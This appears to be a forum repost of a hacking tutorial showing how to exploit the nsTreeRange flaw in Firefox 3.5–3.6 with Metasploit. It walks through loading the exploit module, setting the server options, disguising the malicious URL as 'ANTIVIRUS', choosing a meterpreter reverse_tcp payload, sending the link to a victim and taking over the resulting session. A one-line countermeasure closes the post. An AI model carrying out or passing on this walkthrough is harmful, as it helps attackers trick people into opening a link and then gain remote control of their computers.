Jump to content
Fi8sVrs

Hacking Mozilla Firefox 3.5 to 3.6 nsTreeRange Vulnerability Using Metasploit

Recommended Posts

  • Active Members

Today while surfing I read some news about nsTreeRange Mozilla Firefox version 3.5 to 3.6.1.6 Vulnerability. Actually this vulnerbility ranking is not excellent or good, but it's normal vulnerability. This vulnerability was known at 2011-07-10 by sinn3r. In this tutorial I'm using Windows 7 for my victim Operating system with Mozilla Firefox v 3.5.17. If you also want to try out this tutorial, you can find Mozilla Firefox version which I describe above at oldapps.com.

Requirements :

1. Metasploit Framework

2. Linux OS or Backtrack 5(Metasploit already included inside this distro)

I. The first step, just go to your msfconsole, and then use exploit/windows/browser/mozilla_nstreerange. If it returns cannot find exploit, maybe you should update your msf framework first by running msfupdate.


msf > use exploit/windows/browser/mozilla_nstreerange
msf exploit(mozilla_nstreerange) > show options

Module options (exploit/windows/browser/mozilla_nstreerange):

Name Current Setting Required Description
---- --------------- -------- -----------
CreateThread true yes Whether to execute the payload in a new thread
SEHProlog true yes Whether to prepend the payload with an SEH prolog, to catch crashes and enable a silent exit
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)


Exploit target:

Id Name
-- ----
0 Auto (Direct attack against Windows XP, otherwise through Java, if enabled)

II. There's a few option you should set up first before launching this exploit.

SRVHOST : Your IP address acts as exploit server

SRVPORT : port use to serve request from victim. The default value is 8080 but if your port 80 was free, it's better to use port 80.

URIPATH : It's something looks like http://localhost/URIPATH, you can change this value to make URIPATH more readable by human e.g : http://localhost/ANTIVIRUS, etc.

nsrteerange1.jpg

In above picture I'm also using meterpreter reverse_tcp payload. but you can choose the most suitable payload for you

III. Everything was set up correctly, then run exploit to run our malicious webserver.

nsrteerange2.jpg

IV. After the victim opened our malicious URL we've already send to them, our server processing and create new notepad.exe process at victim computer. Below is the screenshot.

nsrteerange3.jpg

V. A new session ID 1 has created, the next step we can interract with that session ID to gain privilege on victim computer

sessions -l 1

nsrteerange4.jpg

That's it we're already inside victim computer.

Countermeasure : - Always update your Mozilla Firefox into lastest version. - Use personal firewall to detect inbound and outbound traffic. Hope it's useful

Hacking Mozilla Firefox 3.5 to 3.6 nsTreeRange Vulnerability Using Metasploit | Vishnu Valentino Hacking Tutorial, Tips and Trick

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...